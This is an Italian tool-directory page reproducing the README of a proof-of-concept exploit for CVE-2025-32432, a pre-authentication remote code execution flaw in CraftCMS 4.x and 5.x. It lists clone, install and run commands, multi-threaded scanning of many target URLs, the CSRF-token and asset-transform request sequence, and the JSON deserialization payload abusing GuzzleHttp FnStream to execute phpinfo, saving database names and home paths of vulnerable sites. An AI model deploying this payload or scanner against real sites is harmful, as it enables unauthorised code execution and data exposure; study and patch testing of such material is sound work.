Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/sachinart/cve-2025-32432
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubsachinart/cve-2025-32432

CVE-2025-32432

Vedi Repository
27431 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questo repository contiene uno script exploit proof-of-concept per CVE-2025-32432, una vulnerabilità di Remote Code Execution (RCE) pre-autenticazione che interessa CraftCMS versioni 4.x e 5.x. La vulnerabilità risiede nella funzionalità di generazione delle trasformazioni degli asset di CraftCMS.

Condividi

CraftCMS CVE-2025-32432 Exploit di Chirag Artani

Panoramica

Questo repository contiene uno script di exploit proof-of-concept per CVE-2025-32432, una vulnerabilità di Remote Code Execution (RCE) pre-autenticazione che interessa le versioni 4.x e 5.x di CraftCMS. La vulnerabilità risiede nella funzionalità di generazione delle trasformazioni degli asset di CraftCMS.

Questo script di exploit automatizza il rilevamento e la verifica della vulnerabilità:

  1. Estraendo i token CSRF dalla dashboard di amministrazione di CraftCMS
  2. Sfruttando la vulnerabilità tramite l'iniezione di oggetti PHP
  3. Verificando lo sfruttamento riuscito tramite l'estrazione di informazioni di sistema

Avvertenza

⚠️ Questo strumento è fornito esclusivamente per scopi educativi e per test di sicurezza autorizzati.

Utilizzare questo strumento solo contro sistemi per i quali si ha il permesso esplicito di testare. Test non autorizzati su sistemi senza permesso sono illegali e non etici.

Funzionalità

  • Supporto sia per singolo target che per scansione multipla (basata su file)
  • Capacità multi-threading per una scansione più rapida di target multipli
  • Output dettagliato che include il nome del database e la directory home
  • Generazione di report CSV per i target vulnerabili
  • Bypass della verifica SSL per test con certificati autofirmati
  • Gestione robusta degli errori

Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# Installa le dipendenze richieste
pip install -r requirements.txt

Requisiti

  • Python 3.6+
  • Pacchetti Python richiesti (vedi requirements.txt):
    • requests
    • beautifulsoup4
    • urllib3

Utilizzo

Singolo target

Per scansionare un singolo target:

root@kitploit:~
python3 craftcms_rce.py -u example.com

Target multipli

Per scansionare più target da un file (un URL per riga):

root@kitploit:~
python3 craftcms_rce.py -f urls.txt -t 10

Dove -t specifica il numero di thread da utilizzare (predefinito: 5).

Opzioni

root@kitploit:~
-u, --url     URL singolo da testare
-f, --file    File contenente gli URL da testare (uno per riga)
-t, --threads Numero di thread (predefinito: 5)
-h, --help    Mostra il messaggio di aiuto ed esci

Output

Lo script produrrà i risultati nella console e salverà i target vulnerabili in vulnerable.txt in formato CSV con le seguenti colonne:

  • URL
  • Valore di CRAFT_DB_DATABASE (nome del database)
  • Percorso della directory HOME
  • Altre informazioni di sistema

Esempio di output console:

root@kitploit:~
[*] Test del singolo target: https://example.com
[*] Avvio scansione con 5 thread
[+] VULNERABILE: https://example.com
    CRAFT_DB_DATABASE: example_db
    Directory HOME: /home/example

=== RIEPILOGO SCANSIONE ===
URL totali scansionati: 1
Siti vulnerabili: 1
Risultati dettagliati salvati in vulnerable.txt

Come funziona la vulnerabilità

Questa vulnerabilità sfrutta un problema di deserializzazione in CraftCMS. L'exploit:

  1. Effettua una richiesta GET a /index.php?p=admin/dashboard per recuperare un token CSRF
  2. Invia una richiesta POST a /index.php?p=admin/actions/assets/generate-transform con un payload JSON appositamente creato
  3. Il payload include un oggetto PHP che viene deserializzato, portando all'esecuzione arbitraria di codice tramite la classe GuzzleHttp\Psr7\FnStream
  4. Lo sfruttamento riuscito viene verificato eseguendo phpinfo() ed estraendo informazioni specifiche di sistema

Dettagli tecnici

L'exploit sfrutta una deserializzazione insicura nel processo di generazione delle trasformazioni degli asset. Il percorso di codice vulnerabile consente a un utente malintenzionato di iniettare un oggetto PHP personalizzato che viene unserializzato, portando all'esecuzione arbitraria di codice.

I componenti chiave del payload:

root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}

Contributi

Contributi, segnalazioni di problemi e richieste di funzionalità sono benvenuti! Sentiti libero di visitare la pagina delle issues.

Licenza

Questo progetto è concesso in licenza con la licenza MIT - consulta il file LICENSE per i dettagli.

Riferimenti

  • Dettagli CVE-2025-32432
  • Avviso di sicurezza di CraftCMS

Autore

  • Nicolas Bourras (Orange Cyberdefense) - Scoperta originale della vulnerabilità
  • Chirag Artani - Autore dello script di exploit
Scarica lo strumento